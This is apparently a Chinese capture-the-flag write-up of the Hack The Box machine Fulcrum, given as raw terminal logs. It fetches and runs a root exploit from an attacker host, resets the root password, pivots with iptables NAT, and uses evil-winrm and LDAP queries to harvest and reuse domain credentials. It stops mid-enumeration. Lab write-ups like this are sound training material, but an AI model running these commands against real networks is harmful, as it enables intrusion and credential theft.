vnet1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet6 fe80::fc54:ff:fe9e:52f3  prefixlen 64  scopeid 0x20        ether fe:54:00:9e:52:f3  txqueuelen 1000  (Ethernet)        RX packets 1082  bytes 164154 (164.1 KB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 4735  bytes 333045 (333.0 KB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
vnet2: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet6 fe80::fc54:ff:fe9e:52f4  prefixlen 64  scopeid 0x20        ether fe:54:00:9e:52:f4  txqueuelen 1000  (Ethernet)        RX packets 63872  bytes 30420506 (30.4 MB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 99788  bytes 11125703 (11.1 MB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
routecKernel IP routing tableDestination     Gateway         Genmask         Flags Metric Ref    Use Ifacedefault         10.10.10.2      0.0.0.0         UG    0      0        0 ens16010.10.10.0      0.0.0.0         255.255.255.0   U     0      0        0 ens160192.168.122.0   0.0.0.0         255.255.255.0   U     0      0        0 virbr0script /bin/bash /dev/null -qcscript: option requires an argument -- 'c'Try 'script --help' for more information.script -qc /bin/bash /dev/nullwww-data@fulcrum:~/uploads$ lslsFulcrum_Upload_to_Corp.ps1  home.php  index.php  upload.phpwww-data@fulcrum:~/uploads$

还有一个192.168.122网段。我想直接用iptables转发，先提权了：

www-data@fulcrum:/tmp$ uname -auname -aLinux fulcrum 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linuxwww-data@fulcrum:/tmp$ iptables -aiptables -aiptables v1.8.4 (legacy): unknown option "-a"Try `iptables -h' or 'iptables --help' for more information.www-data@fulcrum:/tmp$ find / -perm -u=s -type f 2>/dev/nullfind / -perm -u=s -type f 2>/dev/null/snap/snapd/15534/usr/lib/snapd/snap-confine/snap/core18/2074/bin/mount/snap/core18/2074/bin/ping/snap/core18/2074/bin/su/snap/core18/2074/bin/umount/snap/core18/2074/usr/bin/chfn/snap/core18/2074/usr/bin/chsh/snap/core18/2074/usr/bin/gpasswd/snap/core18/2074/usr/bin/newgrp/snap/core18/2074/usr/bin/passwd/snap/core18/2074/usr/bin/sudo/snap/core18/2074/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core18/2074/usr/lib/openssh/ssh-keysign/snap/core18/2344/bin/mount/snap/core18/2344/bin/ping/snap/core18/2344/bin/su/snap/core18/2344/bin/umount/snap/core18/2344/usr/bin/chfn/snap/core18/2344/usr/bin/chsh/snap/core18/2344/usr/bin/gpasswd/snap/core18/2344/usr/bin/newgrp/snap/core18/2344/usr/bin/passwd/snap/core18/2344/usr/bin/sudo/snap/core18/2344/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core18/2344/usr/lib/openssh/ssh-keysign/snap/core20/1434/usr/bin/chfn/snap/core20/1434/usr/bin/chsh/snap/core20/1434/usr/bin/gpasswd/snap/core20/1434/usr/bin/mount/snap/core20/1434/usr/bin/newgrp/snap/core20/1434/usr/bin/passwd/snap/core20/1434/usr/bin/su/snap/core20/1434/usr/bin/sudo/snap/core20/1434/usr/bin/umount/snap/core20/1434/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core20/1434/usr/lib/openssh/ssh-keysign/snap/core20/1026/usr/bin/chfn/snap/core20/1026/usr/bin/chsh/snap/core20/1026/usr/bin/gpasswd/snap/core20/1026/usr/bin/mount/snap/core20/1026/usr/bin/newgrp/snap/core20/1026/usr/bin/passwd/snap/core20/1026/usr/bin/su/snap/core20/1026/usr/bin/sudo/snap/core20/1026/usr/bin/umount/snap/core20/1026/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core20/1026/usr/lib/openssh/ssh-keysign/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/lib/eject/dmcrypt-get-device/usr/lib/snapd/snap-confine/usr/lib/policykit-1/polkit-agent-helper-1/usr/lib/openssh/ssh-keysign/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper/usr/bin/mount/usr/bin/sudo/usr/bin/pkexec/usr/bin/gpasswd/usr/bin/umount/usr/bin/passwd/usr/bin/fusermount/usr/bin/chsh/usr/bin/at/usr/bin/chfn/usr/bin/newgrp/usr/bin/suwww-data@fulcrum:/tmp$ wget http://10.10.16.3/pwk.pywget http://10.10.16.3/pwk.py--2022-09-03 02:38:55--  http://10.10.16.3/pwk.pyConnecting to 10.10.16.3:80... connected.HTTP request sent, awaiting response... 200 OKLength: 3448 (3.4K) [text/x-python]Saving to: 'pwk.py'
pwk.py              100%[===================>]   3.37K  --.-KB/s    in 0.08s   
2022-09-03 02:38:56 (43.9 KB/s) - 'pwk.py' saved [3448/3448]
www-data@fulcrum:/tmp$ python3 pwk.pypython3 pwk.py# ididuid=0(root) gid=0(root) groups=0(root),33(www-data)# script -qc /bin/bash /dev/nullroot@fulcrum:/root/.ssh# sudo passwdsudo passwdNew password: CaiCaiwhoami
Retype new password: CaiCaiwhoami
passwd: password updated successfullyroot@fulcrum:/root/.ssh#

直接更改root密码：

CrazyInSide:~/.ssh$ ssh root@10.10.10.62          root@10.10.10.62's password: Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
 * Documentation:  https://help.ubuntu.com * Management:     https://landscape.canonical.com * Support:        https://ubuntu.com/advantage
  System information as of Sat 03 Sep 2022 02:46:03 AM UTC
  System load:             1.84  Usage of /:              95.1% of 27.43GB  Memory usage:            85%  Swap usage:              0%  Processes:               264  Users logged in:         0  IPv4 address for ens160: 10.10.10.62  IPv6 address for ens160: dead:beef::250:56ff:feb9:21a8  IPv4 address for virbr0: 192.168.122.1
  => / is using 95.1% of 27.43GB
 * Super-optimized for small spaces - read how we shrank the memory   footprint of MicroK8s to make it the smallest full K8s around.
   https://ubuntu.com/blog/microk8s-memory-optimisation
161 updates can be applied immediately.85 of these updates are standard security updates.To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.To check for new updates run: sudo apt update
Last login: Mon May  9 16:58:30 2022 from 10.10.14.11root@fulcrum:~#

内网还有一台主机存活：

root@fulcrum:~# for i in {1..254}; do (ping -c 1 192.168.122.${i} | grep "bytes from" | grep -v "Unreachable" &); done;64 bytes from 192.168.122.1: icmp_seq=1 ttl=64 time=0.059 ms64 bytes from 192.168.122.228: icmp_seq=1 ttl=128 time=7.32 msroot@fulcrum:~#

进行端口扫描：

root@fulcrum:~# nc -zv 192.168.122.228 80Connection to 192.168.122.228 80 port [tcp/http] succeeded!root@fulcrum:~# nc -zv 192.168.122.228 88
^Croot@fulcrum:~# nc -zv 192.168.122.228 21^Croot@fulcrum:~# nc -zv 192.168.122.228 445^Croot@fulcrum:~# nc -zv 192.168.122.228 5985Connection to 192.168.122.228 5985 port [tcp/*] succeeded!root@fulcrum:~# iptables -n -LChain INPUT (policy ACCEPT)target     prot opt source               destination         LIBVIRT_INP  all  --  0.0.0.0/0            0.0.0.0/0           
Chain FORWARD (policy ACCEPT)target     prot opt source               destination         LIBVIRT_FWX  all  --  0.0.0.0/0            0.0.0.0/0           LIBVIRT_FWI  all  --  0.0.0.0/0            0.0.0.0/0           LIBVIRT_FWO  all  --  0.0.0.0/0            0.0.0.0/0           
Chain OUTPUT (policy ACCEPT)target     prot opt source               destination         LIBVIRT_OUT  all  --  0.0.0.0/0            0.0.0.0/0           
Chain LIBVIRT_FWI (1 references)target     prot opt source               destination         ACCEPT     all  --  0.0.0.0/0            192.168.122.0/24     ctstate RELATED,ESTABLISHEDREJECT     all  --  0.0.0.0/0            0.0.0.0/0            reject-with icmp-port-unreachable
Chain LIBVIRT_FWO (1 references)target     prot opt source               destination         ACCEPT     all  --  192.168.122.0/24     0.0.0.0/0           REJECT     all  --  0.0.0.0/0            0.0.0.0/0            reject-with icmp-port-unreachable
Chain LIBVIRT_FWX (1 references)target     prot opt source               destination         ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0           
Chain LIBVIRT_INP (1 references)target     prot opt source               destination         ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0            udp dpt:53ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:53ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0            udp dpt:67ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:67
Chain LIBVIRT_OUT (1 references)target     prot opt source               destination         ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0            udp dpt:53ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:53ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0            udp dpt:68ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:68root@fulcrum:~#

使用iptables将81端口与5985端口开启：

root@fulcrum:~# iptables -I INPUT -p tcp -m tcp --dport 81 -j ACCEPTroot@fulcrum:~# iptables -I INPUT -p tcp -m tcp --dport 5985 -j ACCEPT

做正向转发，将81端口流量转发给内网主机80端口：

root@fulcrum:~# iptables -t nat -A PREROUTING -p tcp --dport 81 -j DNAT --to-destination 192.168.122.228:80

将5985端口流量转发给内网主机5985端口：

root@fulcrum:~# iptables -t nat -A PREROUTING -p tcp --dport 5985 -j DNAT --to-destination 192.168.122.228:5985

root@fulcrum:~# iptables -t nat -A POSTROUTING -j MASQUERADEroot@fulcrum:~# iptables -I FORWARD -j ACCEPTroot@fulcrum:~# iptables -P FORWARD ACCEPTroot@fulcrum:~# sysctl net.ipv4.ip_forward=1net.ipv4.ip_forward = 1

确定是否添加成功：

root@fulcrum:~# iptables -t nat -v -L PREROUTING -n --line-numberChain PREROUTING (policy ACCEPT 1 packets, 229 bytes)num   pkts bytes target     prot opt in     out     source               destination         1        1    60 DNAT       tcp  --  *      *       0.0.0.0/0            0.0.0.0/0            tcp dpt:81 to:192.168.122.228:802        0     0 DNAT       tcp  --  *      *       0.0.0.0/0            0.0.0.0/0            tcp dpt:5985 to:192.168.122.228:5985

访问81端口，也就是内网的80端口：

看来nginx代理的就是这台主机。

CrazyInSide:~/.ssh$ dirsearch -u http://10.10.10.62:81/  
  _|. _ _  _  _  _ _|_    v0.4.2 (_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/crazyinside/.dirsearch/reports/10.10.10.62-81/-_22-09-03_11-09-08.txt
Error Log: /home/crazyinside/.dirsearch/logs/errors-22-09-03_11-09-08.log
Target: http://10.10.10.62:81/
[11:09:09] Starting: [11:09:12] 403 -  312B  - /%2e%2e//google.com[11:09:43] 403 -  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd[11:10:47] 200 -    5KB - /index.htm

没啥东西，尝试使用WebUser登录5985：

CrazyInSide:~/.ssh$ evil-winrm -i 10.10.10.62 -u WebUser -p 'M4ng£m£ntPa55'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\WebUser\Documents>

flag依旧不在这里：

*Evil-WinRM* PS C:\Users\WebUser> cd desktop*Evil-WinRM* PS C:\Users\WebUser\desktop> ls*Evil-WinRM* PS C:\Users\WebUser\desktop> ls -force*Evil-WinRM* PS C:\Users\WebUser\desktop> ipconfig
Windows IP Configuration

Ethernet adapter Ethernet:
   Connection-specific DNS Suffix  . :   Link-local IPv6 Address . . . . . : fe80::b1ac:4b69:feac:4a7d%7   IPv4 Address. . . . . . . . . . . : 192.168.122.228   Subnet Mask . . . . . . . . . . . : 255.255.255.0   Default Gateway . . . . . . . . . : 192.168.122.1

*Evil-WinRM* PS C:\Users> ls

    Directory: C:\Users

Mode                LastWriteTime         Length Name----                -------------         ------ ----d-----         5/4/2022   5:40 PM                Administratord-r---         5/4/2022   5:40 PM                Publicd-----         9/3/2022   3:13 AM                WebUser

或许还不是这台机器么？可是IP网卡已经没有其他了。

*Evil-WinRM* PS C:\inetpub\wwwroot> cat web.configxml version="1.0" encoding="UTF-8"?> xmlns="http://schemas.microsoft.com/.NetConfiguration/v2.0">     />             connectionString="LDAP://dc.fulcrum.local/OU=People,DC=fulcrum,DC=local" name="ADServices" />                 defaultProvider="ADProvider">                             name="ADProvider" type="System.Web.Security.ActiveDirectoryMembershipProvider, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" connectionStringName="ADConnString" connectionUsername="FULCRUM\LDAP" connectionPassword="PasswordForSearching123!" attributeMapUsername="SAMAccountName" />                                             />                                              />                 value="Default.asp" />                 value="Default.htm" />                 value="index.htm" />                 value="index.html" />                 value="iisstart.htm" />                    *Evil-WinRM* PS C:\inetpub\wwwroot>

里边有一条ldap的查询，包括另一条账号凭证。然后google搜索"如何使用powershell查询LDAP"

*Evil-WinRM* PS C:\inetpub\wwwroot> $adsi = New-Object ADSI("LDAP://dc.fulcrum.local", "fulcrum\ldap", "PasswordForSearching123!")*Evil-WinRM* PS C:\inetpub\wwwroot> $searcher = New-Object ADSISearcher($adsi, "(&(objectClass=user))")*Evil-WinRM* PS C:\inetpub\wwwroot> $searcher.FindAll()
Path                                                                    Properties----                                                                    ----------LDAP://dc.fulcrum.local/CN=Administrator,CN=Users,DC=fulcrum,DC=local   {logoncount, codepage, objectcategory, description...}LDAP://dc.fulcrum.local/CN=Guest,CN=Users,DC=fulcrum,DC=local           {logoncount, codepage, objectcategory, description...}LDAP://dc.fulcrum.local/CN=DC,OU=Domain Controllers,DC=fulcrum,DC=local {ridsetreferences, logoncount, codepage, objectcategory...}LDAP://dc.fulcrum.local/CN=krbtgt,CN=Users,DC=fulcrum,DC=local          {logoncount, codepage, objectcategory, description...}LDAP://dc.fulcrum.local/CN=ldap,CN=Users,DC=fulcrum,DC=local            {samaccountname, givenname, codepage, objectcategory...}LDAP://dc.fulcrum.local/CN=923a,CN=Users,DC=fulcrum,DC=local            {samaccountname, givenname, codepage, objectcategory...}LDAP://dc.fulcrum.local/CN=BTables,CN=Users,DC=fulcrum,DC=local         {samaccountname, givenname, codepage, objectcategory...}LDAP://dc.fulcrum.local/CN=FILE,CN=Computers,DC=fulcrum,DC=local        {logoncount, codepage, objectcategory, iscriticalsystemobject...}

*Evil-WinRM* PS C:\inetpub\wwwroot>

看到第一条是管理员账户，查看特性用$_.Properties，只用查询第一条：

*Evil-WinRM* PS C:\inetpub\wwwroot> $searcher.FindOne() | %{ $_.Properties }
Name                           Value----                           -----logoncount                     {6}codepage                       {0}objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}description                    {Built-in account for administering the computer/domain}usnchanged                     {12848}instancetype                   {4}name                           {Administrator}badpasswordtime                {0}pwdlastset                     {132964712628921140}objectclass                    {top, person, organizationalPerson, user}badpwdcount                    {0}samaccounttype                 {805306368}lastlogontimestamp             {132964665675803546}usncreated                     {8196}objectguid                     {99 149 64 115 108 62 201 74 155 216 168 4 198 81 158 173}memberof                       {CN=Group Policy Creator Owners,CN=Users,DC=fulcrum,DC=local, CN=Domain Admins,CN=Users,DC=fulcrum,DC=local, CN=Enterprise Admins,CN=Users,DC=fulcrum,DC=local, CN=Schema Admins,CN=Users,DC=fulcrum,DC=local...}whencreated                    {5/8/2022 6:52:43 AM}adspath                        {LDAP://dc.fulcrum.local/CN=Administrator,CN=Users,DC=fulcrum,DC=local}useraccountcontrol             {512}cn                             {Administrator}countrycode                    {0}primarygroupid                 {513}whenchanged                    {5/8/2022 8:14:22 AM}dscorepropagationdata          {5/8/2022 7:10:32 AM, 5/8/2022 7:10:32 AM, 5/8/2022 6:55:22 AM, 1/1/1601 6:12:16 PM}lastlogon                      {132964733510360703}distinguishedname              {CN=Administrator,CN=Users,DC=fulcrum,DC=local}logonhours                     {255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255}admincount                     {1}iscriticalsystemobject         {True}samaccountname                 {Administrator}objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 216 239 5 69 222 106 231 38 26 113 214 180 244 1 0 0}lastlogoff                     {0}accountexpires                 {0}

没什么东西，查看全部：

*Evil-WinRM* PS C:\inetpub\wwwroot> $searcher.FindAll() | %{ $_.Properties }
Name                           Value----                           -----logoncount                     {6}codepage                       {0}objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}description                    {Built-in account for administering the computer/domain}usnchanged                     {12848}instancetype                   {4}name                           {Administrator}badpasswordtime                {0}pwdlastset                     {132964712628921140}objectclass                    {top, person, organizationalPerson, user}badpwdcount                    {0}samaccounttype                 {805306368}lastlogontimestamp             {132964665675803546}usncreated                     {8196}objectguid                     {99 149 64 115 108 62 201 74 155 216 168 4 198 81 158 173}memberof                       {CN=Group Policy Creator Owners,CN=Users,DC=fulcrum,DC=local, CN=Domain Admins,CN=Users,DC=fulcrum,DC=local, CN=Enterprise Admins,CN=Users,DC=fulcrum,DC=local, CN=Schema Admins,CN=Users,DC=fulcrum,DC=local...}whencreated                    {5/8/2022 6:52:43 AM}adspath                        {LDAP://dc.fulcrum.local/CN=Administrator,CN=Users,DC=fulcrum,DC=local}useraccountcontrol             {512}cn                             {Administrator}countrycode                    {0}primarygroupid                 {513}whenchanged                    {5/8/2022 8:14:22 AM}dscorepropagationdata          {5/8/2022 7:10:32 AM, 5/8/2022 7:10:32 AM, 5/8/2022 6:55:22 AM, 1/1/1601 6:12:16 PM}lastlogon                      {132964733510360703}distinguishedname              {CN=Administrator,CN=Users,DC=fulcrum,DC=local}logonhours                     {255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255}admincount                     {1}iscriticalsystemobject         {True}samaccountname                 {Administrator}objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 216 239 5 69 222 106 231 38 26 113 214 180 244 1 0 0}lastlogoff                     {0}accountexpires                 {0}logoncount                     {0}codepage                       {0}objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}description                    {Built-in account for guest access to the computer/domain}usnchanged                     {8197}instancetype                   {4}name                           {Guest}badpasswordtime                {0}pwdlastset                     {0}objectclass                    {top, person, organizationalPerson, user}badpwdcount                    {0}samaccounttype                 {805306368}usncreated                     {8197}objectguid                     {98 147 227 7 107 29 20 79 147 154 117 165 204 133 217 29}memberof                       {CN=Guests,CN=Builtin,DC=fulcrum,DC=local}whencreated                    {5/8/2022 6:52:43 AM}adspath                        {LDAP://dc.fulcrum.local/CN=Guest,CN=Users,DC=fulcrum,DC=local}useraccountcontrol             {66082}cn                             {Guest}countrycode                    {0}primarygroupid                 {514}whenchanged                    {5/8/2022 6:52:43 AM}dscorepropagationdata          {5/8/2022 6:55:22 AM, 1/1/1601 12:00:01 AM}lastlogon                      {0}distinguishedname              {CN=Guest,CN=Users,DC=fulcrum,DC=local}iscriticalsystemobject         {True}samaccountname                 {Guest}objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 216 239 5 69 222 106 231 38 26 113 214 180 245 1 0 0}lastlogoff                     {0}accountexpires                 {9223372036854775807}ridsetreferences               {CN=RID Set,CN=DC,OU=Domain Controllers,DC=fulcrum,DC=local}logoncount                     {16}codepage                       {0}objectcategory                 {CN=Computer,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}msdfsr-computerreferencebl     {CN=DC,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=fulcrum,DC=local}iscriticalsystemobject         {True}operatingsystem                {Windows Server 2019 Standard}usnchanged                     {24587}instancetype                   {4}name                           {DC}badpasswordtime                {0}pwdlastset                     {133066638014044691}serviceprincipalname           {Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC.fulcrum.local, ldap/DC.fulcrum.local/ForestDnsZones.fulcrum.local, ldap/DC.fulcrum.local/DomainDnsZones.fulcrum.local, DNS/DC.fulcrum.local...}objectclass                    {top, person, organizationalPerson, user...}badpwdcount                    {0}samaccounttype                 {805306369}lastlogontimestamp             {133066638072992222}usncreated                     {12293}objectguid                     {143 151 162 140 203 166 2 71 128 139 40 15 248 36 220 157}localpolicyflags               {0}whencreated                    {5/8/2022 6:55:20 AM}adspath                        {LDAP://dc.fulcrum.local/CN=DC,OU=Domain Controllers,DC=fulcrum,DC=local}useraccountcontrol             {532480}cn                             {DC}countrycode                    {0}primarygroupid                 {516}whenchanged                    {9/3/2022 7:30:07 AM}operatingsystemversion         {10.0 (17763)}dnshostname                    {DC.fulcrum.local}dscorepropagationdata          {5/8/2022 6:55:22 AM, 1/1/1601 12:00:01 AM}lastlogon                      {133066643997949777}distinguishedname              {CN=DC,OU=Domain Controllers,DC=fulcrum,DC=local}msds-supportedencryptiontypes  {28}samaccountname                 {DC$}objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 216 239 5 69 222 106 231 38 26 113 214 180 232 3 0 0}lastlogoff                     {0}serverreferencebl              {CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=fulcrum,DC=local}accountexpires                 {9223372036854775807}logoncount                     {0}codepage                       {0}objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}description                    {Key Distribution Center Service Account}usnchanged                     {12831}instancetype                   {4}name                           {krbtgt}badpasswordtime                {0}pwdlastset                     {132964665214072440}showinadvancedviewonly         {True}serviceprincipalname           {kadmin/changepw}objectclass                    {top, person, organizationalPerson, user}badpwdcount                    {0}samaccounttype                 {805306368}usncreated                     {12324}objectguid                     {32 246 229 230 16 133 242 69 157 220 11 54 228 63 85 253}memberof                       {CN=Denied RODC Password Replication Group,CN=Users,DC=fulcrum,DC=local}whencreated                    {5/8/2022 6:55:21 AM}adspath                        {LDAP://dc.fulcrum.local/CN=krbtgt,CN=Users,DC=fulcrum,DC=local}useraccountcontrol             {514}cn                             {krbtgt}countrycode                    {0}primarygroupid                 {513}whenchanged                    {5/8/2022 7:10:32 AM}dscorepropagationdata          {5/8/2022 7:10:32 AM, 5/8/2022 6:55:22 AM, 1/1/1601 12:04:16 AM}lastlogon                      {0}distinguishedname              {CN=krbtgt,CN=Users,DC=fulcrum,DC=local}msds-supportedencryptiontypes  {0}admincount                     {1}iscriticalsystemobject         {True}samaccountname                 {krbtgt}objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 216 239 5 69 222 106 231 38 26 113 214 180 246 1 0 0}lastlogoff                     {0}accountexpires                 {9223372036854775807}samaccountname                 {ldap}givenname                      {ldap}codepage                       {0}objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}dscorepropagationdata          {1/1/1601 12:00:00 AM}usnchanged                     {24643}instancetype                   {4}logoncount                     {1}name                           {ldap}badpasswordtime                {0}pwdlastset                     {132964669477355095}objectclass                    {top, person, organizationalPerson, user}badpwdcount                    {0}samaccounttype                 {805306368}lastlogontimestamp             {133066745682798980}streetaddress                  {unknown}usncreated                     {12595}sn                             {user}company                        {fulcrum}objectguid                     {150 136 6 204 202 150 221 75 166 233 206 164 157 88 198 236}whencreated                    {5/8/2022 7:02:27 AM}adspath                        {LDAP://dc.fulcrum.local/CN=ldap,CN=Users,DC=fulcrum,DC=local}useraccountcontrol             {66048}cn                             {ldap}countrycode                    {0}l                              {unknown}primarygroupid                 {513}whenchanged                    {9/3/2022 10:29:28 AM}c                              {UK}lastlogon                      {133066745682798980}distinguishedname              {CN=ldap,CN=Users,DC=fulcrum,DC=local}st                             {UN}postalcode                     {12345}objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 216 239 5 69 222 106 231 38 26 113 214 180 79 4 0 0}lastlogoff                     {0}accountexpires                 {9223372036854775807}samaccountname                 {923a}givenname                      {923a}codepage                       {0}objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}dscorepropagationdata          {5/8/2022 7:10:32 AM, 1/1/1601 12:00:00 AM}usnchanged                     {12813}instancetype                   {4}logoncount                     {0}name                           {923a}badpasswordtime                {0}pwdlastset                     {132964669589856111}objectclass                    {top, person, organizationalPerson, user}badpwdcount                    {0}samaccounttype                 {805306368}streetaddress                  {unknown}usncreated                     {12610}sn                             {923a}company                        {fulcrum}objectguid                     {2 169 160 142 13 17 236 70 152 180 130 93 57 44 104 124}memberof                       {CN=Domain Admins,CN=Users,DC=fulcrum,DC=local}whencreated                    {5/8/2022 7:02:38 AM}adspath                        {LDAP://dc.fulcrum.local/CN=923a,CN=Users,DC=fulcrum,DC=local}useraccountcontrol             {66048}cn                             {923a}countrycode                    {0}l                              {unknown}primarygroupid                 {513}whenchanged                    {5/8/2022 7:10:32 AM}c                              {UK}lastlogon                      {0}distinguishedname              {CN=923a,CN=Users,DC=fulcrum,DC=local}st                             {UN}admincount                     {1}postalcode                     {12345}objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 216 239 5 69 222 106 231 38 26 113 214 180 80 4 0 0}lastlogoff                     {0}accountexpires                 {9223372036854775807}samaccountname                 {BTables}givenname                      {BTables}codepage                       {0}objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}dscorepropagationdata          {1/1/1601 12:00:00 AM}usnchanged                     {16404}instancetype                   {4}logoncount                     {1}name                           {BTables}badpasswordtime                {0}pwdlastset                     {132964669694854344}objectclass                    {top, person, organizationalPerson, user}badpwdcount                    {0}samaccounttype                 {805306368}lastlogontimestamp             {132965813265089947}streetaddress                  {unknown}usncreated                     {12628}sn                             {BTables}company                        {fulcrum}objectguid                     {211 177 93 142 140 210 161 74 180 157 245 248 33 105 89 254}info                           {Password set to ++FileServerLogon12345++}whencreated                    {5/8/2022 7:02:49 AM}adspath                        {LDAP://dc.fulcrum.local/CN=BTables,CN=Users,DC=fulcrum,DC=local}useraccountcontrol             {66048}cn                             {BTables}countrycode                    {0}l                              {unknown}primarygroupid                 {513}whenchanged                    {5/9/2022 2:48:46 PM}c                              {UK}lastlogon                      {132965813265089947}distinguishedname              {CN=BTables,CN=Users,DC=fulcrum,DC=local}st                             {UN}postalcode                     {12345}objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 216 239 5 69 222 106 231 38 26 113 214 180 81 4 0 0}lastlogoff                     {0}accountexpires                 {9223372036854775807}logoncount                     {11}codepage                       {0}objectcategory                 {CN=Computer,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}iscriticalsystemobject         {False}operatingsystem                {Windows Server 2019 Standard}usnchanged                     {24602}instancetype                   {4}name                           {FILE}badpasswordtime                {0}pwdlastset                     {133066646717324030}serviceprincipalname           {WSMAN/FILE, WSMAN/FILE.fulcrum.local, RestrictedKrbHost/FILE, HOST/FILE...}objectclass                    {top, person, organizationalPerson, user...}badpwdcount                    {0}samaccounttype                 {805306369}lastlogontimestamp             {133066638251998389}usncreated                     {12854}objectguid                     {85 210 141 244 110 221 154 74 177 149 208 194 121 84 186 112}localpolicyflags               {0}whencreated                    {5/8/2022 8:49:11 AM}adspath                        {LDAP://dc.fulcrum.local/CN=FILE,CN=Computers,DC=fulcrum,DC=local}useraccountcontrol             {4096}cn                             {FILE}countrycode                    {0}primarygroupid                 {515}whenchanged                    {9/3/2022 7:44:31 AM}operatingsystemversion         {10.0 (17763)}dnshostname                    {FILE.fulcrum.local}dscorepropagationdata          {1/1/1601 12:00:00 AM}lastlogon                      {133066746614970918}distinguishedname              {CN=FILE,CN=Computers,DC=fulcrum,DC=local}msds-supportedencryptiontypes  {28}samaccountname                 {FILE$}objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 216 239 5 69 222 106 231 38 26 113 214 180 82 4 0 0}lastlogoff                     {0}accountexpires                 {9223372036854775807}

name                           {BTables}badpasswordtime                {0}pwdlastset                     {132964669694854344}objectclass                    {top, person, organizationalPerson, user}badpwdcount                    {0}samaccounttype                 {805306368}lastlogontimestamp             {132965813265089947}streetaddress                  {unknown}usncreated                     {12628}sn                             {BTables}company                        {fulcrum}objectguid                     {211 177 93 142 140 210 161 74 180 157 245 248 33 105 89 254}info                           {Password set to ++FileServerLogon12345++}whencreated                    {5/8/2022 7:02:49 AM}adspath                        {LDAP://dc.fulcrum.local/CN=BTables,CN=Users,DC=fulcrum,DC=local}useraccountcontrol             {66048}

我拿到了一组凭证，BTables用户的info中有一条密码：++FileServerLogon12345++。而它对应的应该是：

serviceprincipalname           {WSMAN/FILE, WSMAN/FILE.fulcrum.local, RestrictedKrbHost/FILE, HOST/FILE...}

应该是被防火墙拦截被禁止探测FILE，FILE在这里：

*Evil-WinRM* PS C:\inetpub\wwwroot> $btpass = ConvertTo-SecureString '++FileServerLogon12345++' -AsPlainText -Force*Evil-WinRM* PS C:\inetpub\wwwroot> $btcred = New-Object System.Management.Automation.PSCredential('FULCRUM\btables', $btpass)
*Evil-WinRM* PS C:\inetpub\wwwroot> *Evil-WinRM* PS C:\inetpub\wwwroot> Invoke-Command -ComputerName file.fulcrum.local -Credential $btcred -ScriptBlock { whoami }fulcrum\btables*Evil-WinRM* PS C:\inetpub\wwwroot> Invoke-Command -ComputerName file.fulcrum.local -Credential $btcred -ScriptBlock { ipconfig }
Windows IP Configuration

Ethernet adapter Ethernet:
   Connection-specific DNS Suffix  . :   Link-local IPv6 Address . . . . . : fe80::7951:5c86:6630:5e64%3   IPv4 Address. . . . . . . . . . . : 192.168.122.132   Subnet Mask . . . . . . . . . . . : 255.255.255.0   Default Gateway . . . . . . . . . : 192.168.122.1*Evil-WinRM* PS C:\inetpub\wwwroot> Invoke-Command -ComputerName file.fulcrum.local -Credential $btcred -ScriptBlock { ipconfig /all }
Windows IP Configuration
